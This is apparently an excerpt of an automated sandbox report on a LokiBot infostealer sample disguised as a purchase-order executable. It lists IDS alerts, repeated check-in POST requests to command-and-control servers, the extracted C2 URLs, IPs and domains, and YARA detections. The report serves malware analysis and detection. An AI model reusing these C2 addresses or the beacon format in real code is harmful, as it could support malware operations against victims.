              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49864 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49864 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49864 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49871 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49871 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49871 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49871 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49873 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49873 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49873 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49873 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49875 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49875 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49875 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49875 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49876 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49876 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49876 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49876 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49877 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49877 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49877 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49877 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49879 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49879 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49879 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49879 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49882 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49882 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49882 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49882 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49883 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49883 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49883 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49883 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49884 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49884 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49884 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49884 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49885 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49885 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49885 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49885 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49886 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49886 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49886 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49886 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49887 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49887 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49887 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49887 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49888 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49888 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49888 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49888 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49889 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49889 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49889 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49889 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49890 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49890 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49890 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49890 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49891 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49891 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49891 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49891 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49892 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49892 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49892 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49892 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49893 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49893 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49893 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49893 -> 104.223.93.105:80
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
              Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
              Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 06:15:13 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 06:15:14 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: Purchase Order #5000012803.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: Purchase Order #5000012803.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: Purchase Order #5000012803.exe, Purchase Order #5000012803.exe, 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Purchase Order #5000012803.exe, 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: unknownHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 190Connection: close
              Source: unknownDNS traffic detected: queries for: slimpackage.com
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00404ED4 recv,
              Source: Purchase Order #5000012803.exe, 00000000.00000002.668485739.00000000007BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
